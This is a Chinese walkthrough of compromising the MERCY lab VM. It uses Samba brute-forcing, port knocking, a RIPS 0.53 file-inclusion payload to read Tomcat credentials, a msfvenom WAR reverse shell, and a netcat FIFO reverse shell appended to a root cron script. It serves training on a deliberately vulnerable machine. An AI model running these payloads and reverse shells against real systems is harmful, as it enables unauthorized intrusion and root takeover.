digitalworld.local: MERCY靶机入侵

0x01 前言

MERCY是一个致力于PWK课程安全的靶机系统。MERCY是一款游戏名称,与易受攻击的靶机名称无关。本次实验是攻击目标靶机获取root权限并读系统目录中的proof.txt信息

靶机的下载地址:

https://drive.google.com/uc?id=1YzsW1lCKjo_WEr6Pk511DXQBFyMMR14y&export=download(注意确认下载镜像中MERCY.mf的sha256值是否正确)

0x02 信息收集

1.存活主机扫描

[email protected]:~#arp-scan  -l

发现192.168.1.12就是目标靶机系统

2.端口扫描

通过NAMP对目标靶机进行端口扫描

[email protected]:~# nmap  -A192.168.1.12

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 09:55 EST

Nmap scan report for 192.168.1.12

Host is up (0.00091s latency).

Not shown: 990 closed ports

PORT     STATESERVICE     VERSION

22/tcp   filtered ssh

53/tcp   opendomain      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)

| dns-nsid:

|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu

80/tcp   filtered http

110/tcp  openpop3?

139/tcp  opennetbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

143/tcp  openimap        Dovecot imapd

|_ssl-date: TLS randomness does not represent time

445/tcp  opennetbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)

993/tcp  openssl/imap    Dovecot imapd

|_imap-capabilities: CAPABILITY

| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server

| Not valid before: 2018-08-24T13:22:55

|_Not valid after:  2028-08-23T13:22:55

|_ssl-date: TLS randomness does not represent time

995/tcp  openssl/pop3s?

| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server

| Not valid before: 2018-08-24T13:22:55

|_Not valid after:  2028-08-23T13:22:55

|_ssl-date: TLS randomness does not represent time

8080/tcp open     http        Apache Tomcat/Coyote JSP engine 1.1

| http-methods:

|_  Potentially risky methods: PUT DELETE

|_http-open-proxy: Proxy might be redirecting requests

|_http-server-header: Apache-Coyote/1.1

|_http-title: Apache Tomcat

MAC Address: 00:0C:29:91:A0:C6 (VMware)

Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

OS details: Linux 3.2 - 4.9

Network Distance: 1 hop

Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:

|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s

|_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

| smb-os-discovery:

|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)

|   Computer name: mercy

|   NetBIOS computer name: MERCY\x00

|   Domain name: \x00

|   FQDN: mercy

|_  System time: 2019-02-12T22:57:54+08:00

| smb-security-mode:

|   account_used: guest

|   authentication_level: user

|   challenge_response: supported

|_  message_signing: disabled (dangerous, but default)

| smb2-security-mode:

|   2.02:

|_    Message signing enabled but not required

| smb2-time:

|   date: 2019-02-12 09:57:54

|_  start_date: N/A

TRACEROUTE

HOP RTT     ADDRESS

1   0.91 ms 192.168.1.12

OS and Service detection performed. Please report any incorrec

发现目标端口445,8080等端口开放.其他如22,80被防火墙阻断.其中samba服务已开启(这是本文重点渗透目标)

0x03漏洞利用

无论在任何情况下,我们首先攻击的应用目标是Apache

Tomcat(http://192.168.1.12:8080/)

尝试访问tomcat后台管理页面,但需要输入正确的用户名和密码方可登陆。尝试输入各种已知的信息但还是无法进入。注意到其用户的配置信息在/etc/tomcat7/tomcat-users.xml中。

1.Samba漏洞攻击

通过smbclient命令列出目标靶机中可用的Samba服务共享名.

[email protected]:~# smbclient -NL  192.168.1.12

可从上图中看到共享的几个名称,下面将挂载其共享目录到本地,但还是不允许访问目标共享,这里需身份认证。

[email protected]:~# mkdir  /mnt/file

[email protected]:~# mount  -tcifs  192.168.1.12:/qiu  /mnt/file

2.enum4linux枚举Samba账号

[email protected]:~#  enum4linux -U -o 192.168.1.12

让我们将枚举出来的账号(qiu和pleadformercy)添加到mercy.txt中,并对其账号进行爆破。

3.samba账号爆破

[email protected]:~#hydra -L mercy.txt -P/usr/share/wordlists/fasttrack.txt smb://192.168.1.12:139

可发现成功爆破出qiu的账号,密码为空

4.mount命令挂载目录

[email protected]:~#mount -t cifs//192.168.1.12:/qiu/mnt/file -o username=qiu

列出挂载目录下的文件信息

5.private目录信息收集

发现.private目录提供了一些重要系统信息

[email protected]:~# cd  /mnt/file/

[email protected]:/mnt/file# cd  .private

[email protected]:/mnt/file/.private# ls

opensesame  readme.txtsecrets

[email protected]:/mnt/file/.private# cd opensesame/

[email protected]:/mnt/file/.private/opensesame# ls

config  configprint
[email protected]:/mnt/file/.private/opensesame# head -30 config

Here are settings for your perusal.

Port Knocking Daemon Configuration

[options]

       UseSyslog

[openHTTP]

       sequence    = 159,27391,4

       seq_timeout = 100

       command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT

       tcpflags    = syn

[closeHTTP]

       sequence    = 4,27391,159

       seq_timeout = 100

       command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT

       tcpflags    = syn

[openSSH]

       sequence    = 17301,28504,9999

       seq_timeout = 100

       command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT

       tcpflags    = syn

[closeSSH]

       sequence    = 9999,28504,17301

       seq_timeout = 100

       command     = /sbin/iptables -D iNPUT -s %IP% -p tcp --dport 22 -j ACCEPT

       tcpflags    = syn

上面显示了端口启动守护进程的防火墙端口开放的命令配置.

6.打开目标靶机防火墙端口

看到两组sequence,一组用于HTTP,另一组用于SSH。

(1)http的sequence脚本:

kncok.sh

#!/bin/bash

for PORT in 159 27391 4;do nmap -Pn 192.168.1.12  -p  $PORT;

done

(2)SSH的sequence脚本:

kncok1.sh

#!/bin/bash

for PORT in 17301 28504  9999;do nmap -Pn 192.168.1.12  -p $PORT;

done

(3)通过sequence脚本来打开HTTP的端口

[email protected]:~# ./knoch.sh

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:50 EST

Nmap scan report for 192.168.1.12

Host is up (0.00044s latency).

PORT    STATESERVICE

159/tcp closed nss-routing

MAC Address: 00:0C:29:91:A0:C6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:50 EST

Nmap scan report for 192.168.1.12

Host is up (0.00053s latency).

PORT      STATE  SERVICE

27391/tcp closed unknown

MAC Address: 00:0C:29:91:A0:C6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:50 EST

Nmap scan report for 192.168.1.12

Host is up (0.00042s latency).

PORT  STATESERVICE

4/tcp closed unknown

MAC Address: 00:0C:29:91:A0:C6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

(4)通过sequence脚本来打开SSH的端口

[email protected]:~# ./knoch1.sh

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:58 EST

Nmap scan report for 192.168.1.12

Host is up (0.00049s latency).

PORT      STATESERVICE

17301/tcp closed unknown

MAC Address: 00:0C:29:91:A0:C6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:58 EST

Nmap scan report for 192.168.1.12

Host is up (0.00042s latency).

PORT      STATESERVICE

28504/tcp closed unknown

MAC Address: 00:0C:29:91:A0:C6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:58 EST

Nmap scan report for 192.168.1.12

Host is up (0.00031s latency).

PORT     STATESERVICE

9999/tcp closed abyss

MAC Address: 00:0C:29:91:A0:C6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

通过以上命令开放了80和22端口,现在在kali系统下打开80端口网站。

7.目录扫描

通过目录工具dirb对目标靶机系统80端口网站进行扫描,发现存在robots.txt文件

[email protected]:~# dirb http://192.168.1.12

打开robots.txt的连接地址,发现一个有趣的目录/omercy

打开该目录网站,可发现RIPS 0.53版本存在

8.RIPS漏洞收集

根据EDB-ID 18660,RIPS 0.53易受本地文件包含(LFI)漏洞影响。(RIPS 0.53 LFI)

在  exploit-db 中搜索RIPS 0.53 漏洞。

https://www.exploit-db.com/exploits/18660

其PoC为:

http://localhost/rips/windows/code.php?file=../../../../../../etc/passwd

可以本地文件包含读出目标靶机的/etc/passwd的信息。

9.tomcat再次入侵

通过rips的lfi漏洞来本地包含tomcat-users.xml读取其配置信息。

http://192.168.1.12/nomercy/windows/code.php?file=./../../../../..//etc/tomcat7/tomcat-users.xml

此文件泄露了8080端口上运行的tomcat管理后台的用户名和密码信息

<? <user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/>

<? <user username="qiu" password="mercyplz" roles="manager-gui"/>

有了登录凭证,现在可以登录管理器的webapp来部署恶意webapp,这是一个允许反弹shell的WAR文件。

登陆到管理后台:

http://192.168.1.12:8080/manager/html

目标靶机系统为32位的ubuntu系统

我们可以通过msfvenom命令来生成这样的war包

[email protected]:/opt#  msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.21  LPORT=3333  -f war -o shell.war

部署webapp后门文件shell.war

通过7z命令查看war包的内容,可以看到包含了yillzdtgvccxzwp.jsp文件

[email protected]:/opt# 7z l shell.war

访问恶意Web应用程序,请在浏览器的地址栏中输入以下内容:

http://192.168.1.12:8080/shell/yillzdtgvccxzwp.jsp

在攻击机上执行nc监听反弹命令并使用python生成交互式的shell:python -c ‘import pty; pty.spawn(“/bin/sh”)’

[email protected]:/opt# nc -lvvp 3333

以普通用户权限下查看其falg信息:

[email protected]:/$ cat local.txt

cat local.txt

Plz have mercy on me! :-( :-(

[email protected]:/$

0x04  权限提升

可以通过从tomcat-users.xml中搜索到登录帐户qiu。在信息收集的同时还发现了将权限提升为root的方法。有一个脚本/home/qiu/.private/secrets/timeclock将每隔三分钟,以root权限运行并写入到目录/var/www/html/time中。

[email protected]:/$su qiu
[email protected]:~/.private/secrets$ ls -al/home/qiu/.private/secrets/timeclock

ls -al  /home/qiu/.private/secrets/timeclock

-rwxrwxrwx 1 root root 222 Aug 31 00:47 /home/qiu/.private/secrets/timeclock

[email protected]:~/.private/secrets$ cat timeclock

#!/bin/bash

now=$(date)

echo "The system time is: $now." > ../../../../../var/www/html/time

echo "Time check courtesy of LINUX" >> ../../../../../var/www/html/time

chown www-data:www-data ../../../../../var/www/html/time

将以下命令添加到脚本timclock中,其中NC监听的IP地址为攻击机(kali)的IP地址。

[email protected]:~/.private/secrets$ echo "rm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0</tmp/p | nc 192.168.1.21  5555 1>/tmp/p" >> timeclock

<mp/p | nc 192.168.1.21  5555 1>/tmp/p" >> timeclock

[email protected]:~/.private/secrets$ cat timeclock

cat timeclock

#!/bin/bash

now=$(date)

echo "The system time is: $now." > ../../../../../var/www/html/time

echo "Time check courtesy of LINUX" >> ../../../../../var/www/html/time

chown www-data:www-data ../../../../../var/www/html/time

rm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0</tmp/p | nc 192.168.1.21  5555 1>/tmp/p

设置另一个nc监听,监听端口为5555,3分钟后将反弹到目标root  shell.并在攻击机上执行nc监听反弹命令并使用python生成交互式的shell:python -c ‘import pty; pty.spawn(“/bin/sh”)’

[email protected]:/mnt/file/.private/opensesame# nc -lvvp  5555

listening on [any] 5555 ...

192.168.1.12: inverse host lookup failed: Unknown host

connect to [192.168.1.21] from (UNKNOWN) [192.168.1.12] 39346

python -c "import pty;pty.spawn(‘/bin/bash‘)"

0x05 flag信息查看

进入到root目录然后查看proof.txt得到flag信息

r

[email protected]:~# cd /root

cd /root

[email protected]:~# ls

ls

author-secret.txt  configproof.txt

[email protected]:~# cat  proof.txt

cat  proof.txt

Congratulations on rooting MERCY. :-)

[email protected]:~#

原文地址:https://www.cnblogs.com/backlion/p/10368920.html

时间: 2024-10-18 20:18:41

digitalworld.local: MERCY靶机入侵的相关文章

FourAndSix: 2.01靶机入侵

0x01 前言 FourAndSix2是易受攻击的一个靶机,主要任务是通过入侵进入到目标靶机系统然后提权,并在root目录中并读取flag.tx信息 FourAndSix2.镜像下载地址: https://download.vulnhub.com/fourandsix/FourAndSix2.ova 0x02 信息收集 1.存活主机扫描 arp-scan -l 发现192.168.1.9是目标靶机系统 2.端口探测 使用Nmap对靶机进行扫描 nmap -A 192.168.1.9 查询到开放的

digitalworld.local:Torment Vulnhub Walkthrough

主机层面扫描: ╰─ nmap -p1-65535 -sV -A 10.10.202.135Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-09 14:58 CSTNmap scan report for 10.10.202.135Host is up (0.0012s latency).Not shown: 65516 closed portsPORT STATE SERVICE VERSION21/tcp open ftp vsftpd

Linux后门入侵检测工具,附bash漏洞解决方法[转载]

转自:http://blog.jobbole.com/77663/ 官网 ClamAV杀毒软件介绍 ClamAV是一个在命令行下查毒软件,因为它不将杀毒作为主要功能,默认只能查出您计算机内的病毒,但是无法清除,至多删除文件.ClamAV可以工作很多的平台上,但是有少数无法支持,这就要取决您所使用的平台的流行程度了.另外它主要是来防护一些WINDOWS病毒和木马程序.另外,这是一个面向服务端的软件. 下载ClamAV安装包 ClamAV的官方下载地址为http://www.clamav.net/d

搭建开源入侵检测系统Snort并实现与防火墙联动

Snort作为一款优秀的开源主机入侵检测系统,在windows和Linux平台上均可安装运行.BT5作为曾经的一款经典的渗透神器,基于 Ubuntu,里面已经预装很多的应用,比如Mysql.Apache.Snort等等.Guardian是snort的插件,通过读取snort报警日 志将入侵IP加入到Iptables中.Iptables 是与最新的 3.5 版本 Linux 内核集成的 IP 信息包过滤系统. 本文详细介绍了BT5中安装snrot NIDS并实现与iptables防火墙联动的过程.

【Linux 入侵检测】

检查linux系统是否被入侵或者中毒的步骤? 一.检查操作系统 (1)检查带宽,查看网卡流量 (2)检查系统登录登出日志,安全日志,和/etc/passwd是否被修改过 (3)查看系统是否存在异常进程: pwdx -- 查看进程的路径: lsof  --  查看系统打开的库文件 百度异常进程的名字 (4)查看开机启动服务和定时任务: /etc/rc.local 和 crontab –l (5)分析系统日志 二.检查应用是否存在漏洞,检查应用的版本信息(日志和进程) 三.常用的入侵检测工具 PSA

11个审查Linux是否被入侵的方法

11个审查Linux是否被入侵的方法 一.检查系统日志 lastb命令 检查系统错误登陆日志,统计IP重试次数 二.检查系统用户 1.cat /etc/passwd 查看是否有异常的系统用户 2.grep "0" /etc/passwd 查看是否产生了新用户,UID和GID为0的用户 3.ls -l /etc/passwd 查看passwd的修改时间,判断是否在不知的情况下添加用户 4.查看是否存在特权用户 awk -F: '$3= =0 {print $1}' /etc/passwd

PortSentry是入侵检测工具中配置最简单、效果最直接的工具之一

https://sourceforge.net/projects/sentrytools/ [[email protected] ~]# tar -xzvf portsentry-1.2.tar.gz [[email protected] ~]# cd portsentry_beta/ [[email protected] portsentry_beta]# ls CHANGES portsentry.c portsentry_io.c README.COMPAT CREDITS portsen

周末惊魂:因struts2 016 017 019漏洞被入侵,修复。

入侵(暴风雨前的宁静) 下午阳光甚好,想趁着安静的周末静下心来写写代码.刚过一个小时,3点左右,客服MM找我,告知客户都在说平台登录不了(我们有专门的客户qq群).看了下数据库连接数,正常.登录阿里云发现cpu 居高不下.客户还在等着,只好先重启tomcat.重启后平台登陆正常.本以为是用户导数据或者连接池被占用光了(这个以前出现过,也比较坑),重启下就会没事. 15分钟左右,客服MM又找我,说平台打开很慢. 我打开登录页面加载都很慢,这时候还是不知道什么问题,上阿里云看看,一看发现有攻击. 看

从Powershell 入侵脚本学到的如何执行后台runspace~

豆子今天无聊在github上看看有什么有意思的PowerShell脚本,无意中发现了PowerSploit这个项目,仔细看了看,这个模块是针对入侵测试写的,里面有大量相关的黑客脚本,随便找了一个试试看. 比如说这个,可以用来记录键盘的输入内容,完整的脚本我就不贴出来了. https://github.com/PowerShellMafia/PowerSploit/blob/dev/Exfiltration/Get-Keystrokes.ps1 具体实现的功能先不去考虑,我很好奇他是怎么在后台执行